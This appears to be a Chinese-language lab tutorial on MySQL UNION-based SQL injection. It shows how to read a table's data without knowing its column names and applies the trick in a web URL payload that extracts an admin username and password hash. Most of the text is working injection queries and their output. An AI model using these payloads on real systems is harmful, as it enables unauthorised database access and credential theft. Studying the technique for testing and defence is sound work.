0x00 概要

在无法获取列名的时候很好用

0x01 实验数据表

  1. # tdb_goods表  一共7个字段
  2. mysql> select * from tdb_goods limit 0,1;
  3. +----------+-----------------------+------------+------------+-------------+---------+------------+
  4. | goods_id | goods_name            | goods_cate | brand_name | goods_price | is_show | is_saleoff |
  5. +----------+-----------------------+------------+------------+-------------+---------+------------+
  6. |        1 | R510VC 15.6英寸笔记本 | 笔记本     | 华硕       | 3399.000    |       1 |          0 |
  7. +----------+-----------------------+------------+------------+-------------+---------+------------+
  8. 1 row in set
  1. # tdb_admin 表  一共3个字段
  2. mysql> select id,username,password from tdb_admin limit 0,1;
  3. +----+----------+----------------------------------+
  4. | id | username | password                         |
  5. +----+----------+----------------------------------+
  6. |  1 | admin    | 7fef6171469e80d32c0559f88b377245 |
  7. +----+----------+----------------------------------+
  8. 1 row in set

0x02 实验

假设现在只知道表名不知道列名,但是我们又需要读数据那么我们的sql可以这样写: select 1,2,3 union select * from tdb_admin;

  1. mysql> select 1,2,3 union select * from tdb_admin;
  2. +---+-------+----------------------------------+
  3. | 1 | 2     | 3                                |
  4. +---+-------+----------------------------------+
  5. | 1 | 2     | 3                                |
  6. | 1 | admin | 7fef6171469e80d32c0559f88b377245 |
  7. +---+-------+----------------------------------+
  8. 2 rows in set

tdb_admin表的id,username,password列给替换成了1,2,3列,这样就不需要知道这表原来的列名叫什么.

接着下一步操作,查出数据以下为sql

  • id 替换为 1
  • username 替换为 2
  • password 替换为 3
  1. # 取 tdb_admin数据的id字段的数据
  2. mysql> select `1` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
  3. +---+
  4. | 1 |
  5. +---+
  6. | 1 |
  7. +---+
  8. 1 row in set
  1. # 取 tdb_admin数据的username字段的数据
  2. mysql> select `2` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
  3. +-------+
  4. | 2     |
  5. +-------+
  6. | admin |
  7. +-------+
  8. 1 row in set
  1. # 取 tdb_admin数据的password字段的数据
  2. mysql> select `3` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
  3. +----------------------------------+
  4. | 3                                |
  5. +----------------------------------+
  6. | 7fef6171469e80d32c0559f88b377245 |
  7. +----------------------------------+
  8. 1 row in set

注意: 取数据时limit下表从1,1开始取才是tdb_admin表的第一条数据

0x03 实际结合

web语句: http://www.test.com/sql.php?id=-1 union select 1,2,3,4,5,6,(select 2 from (select 1,2,3 union select * from tdb_admin)a limit 1,1);

数据库语句: select from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat(‘~’,1,’~’,2,’~’,3) from (select 1,2,3 union select from tdb_admin)a limit 1,1);

  1. mysql> select * from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat('~',`1`,'~',`2`,'~',`3`) from (select 1,2,3 union select * from tdb_admin)a limit 1,1);
  3. +----------+------------+------------+------------+-------------+---------+-------------------------------------------+
  4. | goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff                                |
  5. +----------+------------+------------+------------+-------------+---------+-------------------------------------------+
  6. |        1 | 2          | 3          | 4          | 5.000       |       6 | ~1~admin~7fef6171469e80d32c0559f88b377245 |
  7. +----------+------------+------------+------------+-------------+---------+-------------------------------------------+
  8. 1 row in set